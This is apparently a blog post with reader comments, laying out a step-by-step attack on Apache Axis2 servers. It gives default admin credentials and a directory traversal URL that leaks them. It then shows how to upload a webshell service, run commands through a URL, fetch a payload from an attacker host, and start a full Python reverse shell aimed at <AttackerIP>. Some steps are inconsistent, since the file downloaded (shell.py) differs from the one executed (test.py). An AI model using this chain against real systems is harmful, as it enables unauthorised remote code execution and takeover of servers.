Disclaimer:
I do not condone or take responsibility for any illegal use of this tutorial. Please only target hosts you have permission to test.
Prerequisites
For this exploit to work you must have:
- Valid admin console credentials
- Default = admin:axis2
- Public access to the admin console
- https://victim.com/axis2/axis2-admin
Discovery
There are a couple of ways to potentially find credentials for Axis2 servers. Some of these include: default credentials, weak credentials that can be brute forced, or outdated Axis2 servers. We will use a vulnerability in Apache Axis2 <= v1.4.1 to discover the necessary credentials. This vulnerability is a directory traversal that gives read access to the configuration file. This can be discovered using modules in Nmap and OpenVAS.
Nmap
$ nmap -p<port> --script http-axis2-dir-traversal <ip>
|_http-axis2-dir-traversal.nse: Admin credentials found -> admin:axis2
OpenVAS
FYI
- There is a Metasploit module at "exploit/multi/http/axis2_deployer" that will attempt to "Autopwn" the server.
- The code can be found at Github.
- I have tried this exploit multiple times with no success.
Manual Validation
- Navigating to https://victim.com/axis2/services/Version?xsd=../conf/axis2.xml will allow us to get the credentials. They should look like this:
- When you navigate to https://victim.com/axis2/axis2-admin/ it should give you the login portal.
<parameter name="userName">admin</parameter> <parameter name="password">axis2</parameter>
Create the Payload
A simple Axis2 webshell can be found at https://github.com/CaledoniaProject/AxisInvoker
- Download the file
- Compile the file
- Modify $JAVA_HOME if necessary
- "ant -v" to build
Exploit
- Upload the AxisInvoker.aar service.
- Verify the deployment by checking the Deactivate or Activate service tab.
- Verify the shell works by running https://victim.com/axis2/services/AxisInvoker/exec?cmd=id
- Since stable shells are superior to web shells, we will improve to a stable shell. You will need to find what languages are on the system or use a system native option (like nc).
- Get a shell and modify it to your host machine.
- I usually get most of my shells from PentestMonkey
- Download your reverse shell from your webserver to the victim machine.
- https://victim.com/axis2/services/AxisInvoker/download?url=http://<AttackerIP>/shell.py&file=shell.py
- Listen for the reverse shell by running "nc -nlvp 443".
- Execute your shell on the victim machine.
- https://victom.com/axis2/services/AxisInvoker/exec?cmd=python%20test.py
- After a few seconds, you should have a shell on your listener!
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect(("<AttackerIP>",443));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2); p=subprocess.call(["/bin/sh","-i"]);
Hope that helps in your future pentests!
The issue has been fixed in Axis 2 1.5.3 onwards
ReplyDeleteWhat makes you think that it has been fixed?
ReplyDeleteThis exploitation methodology is abusing the administrator privileges to upload a malicious service. I believe this will always be valid attack vector if you have valid admin credentials and access to the administration panel.
Navigation to https://victim.com/axis2/services/Version?xsd=../conf/axis2.xml will not work in Axis 2 1.5.3 as they have replaced the transport receiver from SimpleHTTPServer to AxisServletListener.It will not allow you navigate to the page. You can check my below blog for details:
DeleteNavigation to https://victim.com/axis2/services/Version?xsd=../conf/axis2.xml will not work in Axis 2 1.5.3 as they have replaced the transport receiver from SimpleHTTPServer to AxisServletListener.It will not allow you navigate to the page.
http://souravdalal.blogspot.in/2018/03/axis-2-directory-traversal-vulnerability.html
Although the directory traversal is no longer valid in updated Axis2 servers, the post is primarily discussing how to manually exploit an Axis2 server to obtain RCE when you have access to the admin console and valid admin credentials. The directory traversal issue is just one of the potential ways to discover those valid credentials.
DeleteThanks!
ReplyDelete